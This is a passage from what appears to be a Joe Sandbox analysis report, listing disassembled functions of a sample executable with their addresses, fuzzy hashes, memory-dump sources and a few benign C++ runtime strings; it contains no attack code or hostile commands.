Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: b29a5adb9fd896d05f6e5afdb96a8cab5316a2c34f5ea098508e42382409287d
Instruction ID: 5d9cd1112febffc96139c66b15ac808945197c797b4d771048a077ade359acbb
Opcode Fuzzy Hash: b29a5adb9fd896d05f6e5afdb96a8cab5316a2c34f5ea098508e42382409287d
Instruction Fuzzy Hash: 97627B22A0CFC289E7709B25A4447ABBBA1FB85784F984135EB8D43B99DF3CD454CB50

Function 00007FF75F908F20 Relevance: 1.9, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0698f6df3787ddaa05ef98e561f0edd88bcab210f8b56cfa12bab591b1a70919
Instruction ID: 9a6fbde08bfebb88e06e05989e5a36bed136f976409e7f14af7c4def4140a311
Opcode Fuzzy Hash: 0698f6df3787ddaa05ef98e561f0edd88bcab210f8b56cfa12bab591b1a70919
Instruction Fuzzy Hash: 9D52933260CBC286E7659B2590402AEBBA6F795794F584135EBD9837DDCF3CE850CB20

Function 00007FF75F8D8920 Relevance: 1.9, Strings: 1, Instructions: 640COMMON

Download Yara Rule

Strings

0, xrefs: 00007FF75F8D9268

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 8138f7841b37fc0ae1978161da3a701b0b157e1b2e5d0f6d22eb1654adba8d06
Instruction ID: 1674ed3bb0ee82e8afec4b6a039d4edcb55d18ee1a0f6a4ccf77e9f6d55631e8
Opcode Fuzzy Hash: 8138f7841b37fc0ae1978161da3a701b0b157e1b2e5d0f6d22eb1654adba8d06
Instruction Fuzzy Hash: F5529422A0C6C181EAA0AB15D4403BBE7A1EF85794F9C4132DAAE8B7D5CF7DF854D710

Function 00007FF75F909AD0 Relevance: 1.9, APIs: 1, Instructions: 638COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e567e4460cd1929917eb7d8092f56d2ba6b35d79253c3f73c9a6ea1430c1e34
Instruction ID: 1b7a5168c94a655823279198c7fb9426d4ee8a9b6a41b952f0217d751918b03e
Opcode Fuzzy Hash: 7e567e4460cd1929917eb7d8092f56d2ba6b35d79253c3f73c9a6ea1430c1e34
Instruction Fuzzy Hash: 9A52C62250DAC286E7219B69D0402AEFBA5F7857A4F480235EB9D837DDCF7CD850CB61

Function 00007FF75F9083D0 Relevance: 1.9, APIs: 1, Instructions: 636COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f24d0e43e873c5b9285c9fb8ff68957e9342ae24e852544cba1b979b29b250a2
Instruction ID: 7f5ad31929b00ca57eaa46192b1b472dcf9784d553f8eeee60e1aff333ed5672
Opcode Fuzzy Hash: f24d0e43e873c5b9285c9fb8ff68957e9342ae24e852544cba1b979b29b250a2
Instruction Fuzzy Hash: E952956260CBC186E7219B65A0402EBFBA4F7957A4F480635EF9D83BD9CF7CD4548B20

Function 00007FF75F90A620 Relevance: 1.9, APIs: 1, Instructions: 630COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a504be032e5913bafd47d0c2a1bc060521c65f7813b829636fe61b6ec759e33b
Instruction ID: f213496184a62e57a90121a54951400d9c773b67978e5b4be7d5854e016b952f
Opcode Fuzzy Hash: a504be032e5913bafd47d0c2a1bc060521c65f7813b829636fe61b6ec759e33b
Instruction Fuzzy Hash: 5F52E73260DBC186E7619A25E0003AEBBA5F791754F884135EB9983BDDCF3CD854CB61

Function 00007FF75F9510F0 Relevance: 1.8, Strings: 1, Instructions: 573COMMON

Download Yara Rule

Strings

basic_string::append, xrefs: 00007FF75F9519BF, 00007FF75F951A07

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: basic_string::append
API String ID: 0-3811946249
Opcode ID: ac4332f32bca6a1eca298c33a053cd57ce21bedcacafd793bd8680f231698369
Instruction ID: 42ec22a01e0f17edb338741c30fb9497b979c8474392225dffeb2cbc289a018d
Opcode Fuzzy Hash: ac4332f32bca6a1eca298c33a053cd57ce21bedcacafd793bd8680f231698369
Instruction Fuzzy Hash: 2522A262B18EC681EB24EA65A4106BAE291FF41BC4F8C4531DE5D8779DEF3CE4818350

Function 00007FF75F8DD720 Relevance: 1.8, Strings: 1, Instructions: 506COMMON

Download Yara Rule

Strings

y, xrefs: 00007FF75F8DDD8C

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: y
API String ID: 0-4225443349
Opcode ID: 00e3bf986532cd8c3f5da5e7db3c43c67c750486d54463f6ac4e7e5168cc2e50
Instruction ID: 004697ed750fa07070a0f69b169d0308d2d7b7837b0fc86274159bfca71fc673
Opcode Fuzzy Hash: 00e3bf986532cd8c3f5da5e7db3c43c67c750486d54463f6ac4e7e5168cc2e50
Instruction Fuzzy Hash: 1802D236609F8486E7609F6AF84079AB7A5F789B90F54412AEECC47B28DF3CD055CB00

Function 00007FF75F8C1580 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59900aa1fd7c55f1a40635090808814f53b3c496e68cf3ff033d1f448ead1d90
Instruction ID: ed39847f82b6d8eff91b50ade657b1c5a0efe28839221bf2f7b1d7d089516f30
Opcode Fuzzy Hash: 59900aa1fd7c55f1a40635090808814f53b3c496e68cf3ff033d1f448ead1d90
Instruction Fuzzy Hash: D591D972B187814BE764EE2694506BBF6A1EB84788F8C5034ED4A4FB59DE3CF8109F50

Function 00007FF75F8E3A20 Relevance: 1.7, Strings: 1, Instructions: 432COMMON

Download Yara Rule

Strings

cannot create shim for unknown locale::facet, xrefs: 00007FF75F8E4335

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: cannot create shim for unknown locale::facet
API String ID: 0-3485955043
Opcode ID: bce6c4018e0d29dcd16b808fcdc0caf0419a3559b49e9d5b2504a0edea35075d
Instruction ID: 286d26b5410bb7f312a97bcf3628175014c60ce504df0855fa30a42705baa294
Opcode Fuzzy Hash: bce6c4018e0d29dcd16b808fcdc0caf0419a3559b49e9d5b2504a0edea35075d
Instruction Fuzzy Hash: 35325E32A0AF8597E764AF15E5553AAB3A0FB04744F888039C7CD4BB95DF7CE46483A0

Function 00007FF75F8FB0C0 Relevance: 1.7, Strings: 1, Instructions: 403COMMON

Download Yara Rule

Strings

-, xrefs: 00007FF75F8FB21C

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 0d7dd12613f0f97f6d4efc2935ded9c75b576818ef2beb108cea7798af2851bd
Instruction ID: faf15c16083e4c2fbb853be72024daa9a3c35dafa46b887ea36588cb978e0b11
Opcode Fuzzy Hash: 0d7dd12613f0f97f6d4efc2935ded9c75b576818ef2beb108cea7798af2851bd
Instruction Fuzzy Hash: E102B726B1C7C385EB649A25D4403BDA761FBA1B84F8C4531DA8D0BB94DF2DE462E720

Function 00007FF75F8F9AF0 Relevance: 1.7, Strings: 1, Instructions: 403COMMON

Download Yara Rule

Strings

-, xrefs: 00007FF75F8F9C4C

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 7c39f3f350541155cc9856a67a2df6a4d34f6e83d62a8642f01eaeeb364e73cc
Instruction ID: cb715e493feb2dd64c89db2bebd01c7281bb06ac80d20aa8b7906ccee598cdf0
Opcode Fuzzy Hash: 7c39f3f350541155cc9856a67a2df6a4d34f6e83d62a8642f01eaeeb364e73cc
Instruction Fuzzy Hash: C702EA2660CBC285EB649B25D4403BDE761FBA1B94F884071DA8D0BBD4DF7DE462E720

Function 00007FF75F8ECF0A Relevance: 1.6, Strings: 1, Instructions: 349COMMON

Download Yara Rule

Strings

c, xrefs: 00007FF75F8ECF45

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: c
API String ID: 0-112844655
Opcode ID: f51cd90450abb64c71f8cac3a6d7a93f7cb70e09a503abf1c888e2cba89a7d8d
Instruction ID: 3a176eb8becc4f697accd225f76939ee655498b77c87ff2f2eead85428821b2b
Opcode Fuzzy Hash: f51cd90450abb64c71f8cac3a6d7a93f7cb70e09a503abf1c888e2cba89a7d8d
Instruction Fuzzy Hash: 74E1B133A0CBD286DA70EA1490443FAB7A1FB95B50F890139DB990B798DF3CE569D710

Function 00007FF75F8C54E0 Relevance: 1.6, Strings: 1, Instructions: 310COMMON

Download Yara Rule

Strings

., xrefs: 00007FF75F8C563D

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 31ef33f10eb3595401dee1d51fb47bdb6ee357af58df66754f874810386ccdf6
Instruction ID: c0831af633a7536f31a01247c2d9fc73ed78fc769c65c37cca6a2183a1a85bcd
Opcode Fuzzy Hash: 31ef33f10eb3595401dee1d51fb47bdb6ee357af58df66754f874810386ccdf6
Instruction Fuzzy Hash: 87B1C966F183C286FF686E2594187F9E652EB40B84FDC8134DA490F7C4DE6DF858A720

Function 00007FF75F8EC418 Relevance: 1.6, Strings: 1, Instructions: 305COMMON

Download Yara Rule

Strings

;, xrefs: 00007FF75F8EC6DF

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: ;
API String ID: 0-1661535913
Opcode ID: ec7a2830da4d48a95711fae9f26c6053fc43fba10740e8a0630c9b66981b6d16
Instruction ID: 9b2559f18ec164cf32558904a54b10d791078c473885fd6ec59304db3366ec5c
Opcode Fuzzy Hash: ec7a2830da4d48a95711fae9f26c6053fc43fba10740e8a0630c9b66981b6d16
Instruction Fuzzy Hash: A3E16132A0CBC582D670AB15A0443EEB7A1F789780F894129DBCD4BB59DF3CE465D750

Function 00007FF75F8F9EFD Relevance: 1.5, Strings: 1, Instructions: 293COMMON

Download Yara Rule

Strings

-, xrefs: 00007FF75F8F9C4C

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 26ec5823530fc5b188e7371d1f107cceac771e511b1d2b68aff353ef9dbe458a
Instruction ID: b2a979400647989bfad6d964aa7150f1ce3bdb82a7ba1dbc8f18ca76fe1ad844
Opcode Fuzzy Hash: 26ec5823530fc5b188e7371d1f107cceac771e511b1d2b68aff353ef9dbe458a
Instruction Fuzzy Hash: 68D1D72260C7C189EB719B29D4003ADF7A1F7A1794F884171DA8D07799DF2CE4A2DB20

Function 00007FF75F8FB4CD Relevance: 1.5, Strings: 1, Instructions: 293COMMON

Download Yara Rule

Strings

-, xrefs: 00007FF75F8FB21C

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: b077775df7349ecc019c4d8c1298b31854faefb36c20257480eebb3e2e625f3f
Instruction ID: 9649d0098cf571db2388c222130feaacad5dcfe1ec7e9413301a1114cc06fc92
Opcode Fuzzy Hash: b077775df7349ecc019c4d8c1298b31854faefb36c20257480eebb3e2e625f3f
Instruction Fuzzy Hash: A4D1A82260D7C689EB719B29D4007ADE7A1FB91784F8C4135DACD47B99CF2CE462DB20

Function 00007FF75F8CC4C0 Relevance: 1.5, APIs: 1, Instructions: 42timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF75F8CC505

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: da8940468516743f49922f1172db13e05d8f456f004806dd5e29fd59d9c15568
Instruction ID: 94f25a97c8ae7b0f677d459682594471bd4e6b5b702291057f8b5d0085c0e010
Opcode Fuzzy Hash: da8940468516743f49922f1172db13e05d8f456f004806dd5e29fd59d9c15568
Instruction Fuzzy Hash: 1C01B5B7715A8886DF61DF19F9400AAF362E7987D4B489131DE8C47768DE3CE542C700

Function 00007FF75F8C8F80 Relevance: 1.5, APIs: 1, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa496184d2be5aeca849a71552beb47a1d9b586cb93d38a0f5d309a6fdee0e75
Instruction ID: 5310a63eda408cf333b31d72062e25deba35fc8b4be3a0ada4c20efb12ab7d70
Opcode Fuzzy Hash: aa496184d2be5aeca849a71552beb47a1d9b586cb93d38a0f5d309a6fdee0e75
Instruction Fuzzy Hash: 25A10262A087D586FB619E2594043FDBA92BB45B44F898172DABD4F3C4DE3CFA10E710

Function 00007FF75F962BA0 Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

basic_filebuf::_M_convert_to_external conversion error, xrefs: 00007FF75F962E9C

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
